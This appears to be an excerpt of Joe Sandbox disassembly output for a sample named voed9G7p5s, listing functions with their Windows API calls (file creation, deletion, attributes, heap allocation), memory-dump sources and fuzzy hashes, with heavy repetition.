                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: ca7c500c8c6311083525eb927d3e5157edb21a88fae1a2a56392d1f6d7292738
                                                                                                    • Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
                                                                                                    • Opcode Fuzzy Hash: ca7c500c8c6311083525eb927d3e5157edb21a88fae1a2a56392d1f6d7292738
                                                                                                    • Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30
                                                                                                    Function 00E1E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: 8a995cea9eef4b2d93fdbc9ec183fe9b06f70943c9a4a65ee048475c090ddff8
                                                                                                    • Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
                                                                                                    • Opcode Fuzzy Hash: 8a995cea9eef4b2d93fdbc9ec183fe9b06f70943c9a4a65ee048475c090ddff8
                                                                                                    • Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30
                                                                                                    Function 00E2BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6
                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E2BA89,?,00000000), ref: 00E2BC64
                                                                                                    • GetCPInfo.KERNEL32(00000000,00E2BA89,?,?,?,00E2BA89,?,00000000), ref: 00E2BC77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CodeInfoPageValid
                                                                                                    • String ID:
                                                                                                    • API String ID: 546120528-0
                                                                                                    • Opcode ID: 1dcea1c091da1ea0d4c8cfbab0bfbde1f5ff30f595cdd7aee10dbbe0d1a38987
                                                                                                    • Instruction ID: 83a67bbee4c19ca457e8c4eec935fafcb5aac4917b281a97f08f86982a61a0fc
                                                                                                    • Opcode Fuzzy Hash: 1dcea1c091da1ea0d4c8cfbab0bfbde1f5ff30f595cdd7aee10dbbe0d1a38987
                                                                                                    • Instruction Fuzzy Hash: EF516470A002659EDB248F71E8816FBFBF4EF41304F1864AED496BB292D7359946CB90
                                                                                                    Function 00E09A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E09A50,?,?,00000000,?,?,00E08CBC,?), ref: 00E09BAB
                                                                                                    • GetLastError.KERNEL32(?,00000000,00E08411,-00009570,00000000,000007F3), ref: 00E09BB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
                                                                                                    • Instruction ID: 4a23b0669135f3d1a8eeb577f1899a602d399923073a5b8c7cb335e9fc808d63
                                                                                                    • Opcode Fuzzy Hash: 76a99e9de7d24b64af308780e96def8f6882054d85cff11832217ada2e5b95a0
                                                                                                    • Instruction Fuzzy Hash: 4541DE306043018FDB24DF25E58496AB7E5FBD4324F149A2DE891A32E3D770AC848E59
                                                                                                    Function 00E01E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E01E55
                                                                                                      • Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF
                                                                                                    • _wcslen.LIBCMT ref: 00E01EFD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838827086-0
                                                                                                    • Opcode ID: d4a907c3896ddc289b39cc5d5c3a0023eee13209a195027fa1b6fe4abb509d89
                                                                                                    • Instruction ID: f224e7db64ca74f9293ab96cdaea24ea3a98261b3c097611a1e29bb7d785f9bb
                                                                                                    • Opcode Fuzzy Hash: d4a907c3896ddc289b39cc5d5c3a0023eee13209a195027fa1b6fe4abb509d89
                                                                                                    • Instruction Fuzzy Hash: F2314A71904209AFCF15DFA8C945AEEBBF6AF48304F1010ADE845B7291C7365E91CB60
                                                                                                    Function 00E09DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1392018926-0
                                                                                                    • Opcode ID: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
                                                                                                    • Instruction ID: 1d09516cec843a621ebaab2b56dfbffea0302eb166e0b30f6dad0b73ebed61e4
                                                                                                    • Opcode Fuzzy Hash: ebef00d2a5f1ece77efa6831570799bc51dc005f33a70699aa92aeb251d3ea25
                                                                                                    • Instruction Fuzzy Hash: 892104312882469FC714CF74C891AABBBE4AF91308F08591CF4D593183D328DD8DCB61
                                                                                                    Function 00E0966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E09F27,?,?,00E0771A), ref: 00E096E6
                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E09F27,?,?,00E0771A), ref: 00E09716
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
                                                                                                    • Instruction ID: 48d7580cd2653e6ef2bfaaecacee2642d1c15fb0cd5d87b73335126b7eeac581
                                                                                                    • Opcode Fuzzy Hash: 44f7fa20b0960b401d57de28f412d1527d3442dd7b9d876124b0b3219559e945
                                                                                                    • Instruction Fuzzy Hash: 0C21ACB1500344AEE2308E659C89BE7B7DCEB49324F101A19FAD6E25D3C7A5A8C48A71
                                                                                                    Function 00E09E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E09EC7
                                                                                                    • GetLastError.KERNEL32 ref: 00E09ED4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
                                                                                                    • Instruction ID: d6336fa2687594f3bb9c0892736a4938c563d465747a145458513463bb02de20
                                                                                                    • Opcode Fuzzy Hash: 5413912ca5a987cf3e9be99f6fe529819294dbfe767fb9cb06f4cca06e807dc5
                                                                                                    • Instruction Fuzzy Hash: DA11E530600704ABD734DA39CC45BA6B7E9AB44364F505A6AE162F26D2D770EDCACB60
                                                                                                    Function 00E28E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E28E75
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00E41098,00E017CE,?,?,00000007,?,?,?,00E013D6,?,00000000), ref: 00E28EB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1482568997-0
                                                                                                    • Opcode ID: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
                                                                                                    • Instruction ID: 7d19c49885f4e4d7b03f25dc191bf4a1a6c60ba54030144a3365a622094d4e0b
                                                                                                    • Opcode Fuzzy Hash: 5dd59248cc81be74c4a55ca44d66e4df6f3209084a74e98c20adcff2b197dc3a
                                                                                                    • Instruction Fuzzy Hash: 4EF0F6326031396ADB212B26BE05FAF37989F81B70F277125F814BA1A1DF70DD0081A1
                                                                                                    Function 00E1109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00E110AB
                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00E110B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
                                                                                                    • Instruction ID: 676e5058b6fa73cb9fddeebd049ff59b7ac67a5daff0af5e0775ef04e2270afb
                                                                                                    • Opcode Fuzzy Hash: 21c2e8818e611511c76d90997c27c875d846a7db6a63ddb2cecc3079c048f7e2
                                                                                                    • Instruction Fuzzy Hash: C6E09232F00149AB8F0D87B59C099EB76DDEA4820831051F9E603F7101F934DEC54A60
                                                                                                    Function 00E0A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
                                                                                                    • Instruction ID: 0686bb6b5da50affa385db07ac19522cbbcba06fd7df4131c329976d0b16fdb2
                                                                                                    • Opcode Fuzzy Hash: 8be4d6f59674d144d572797123b88343de1a8dacbd73ef1f6cde055f97895071
                                                                                                    • Instruction Fuzzy Hash: 76F0153224024DABEB015F61DC45FDA3BBCBB0438AF488061B949E61A0DB71DAD8AA50
                                                                                                    Function 00E0A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
